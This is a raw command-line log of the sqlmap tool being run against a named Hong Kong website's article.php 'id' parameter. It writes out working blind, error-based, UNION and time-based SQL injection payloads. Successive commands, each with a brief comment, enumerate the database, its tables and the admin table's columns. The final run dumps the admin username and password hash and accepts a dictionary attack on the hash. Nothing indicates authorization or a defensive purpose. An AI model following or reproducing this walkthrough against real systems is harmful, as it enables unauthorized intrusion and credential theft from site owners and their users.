D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>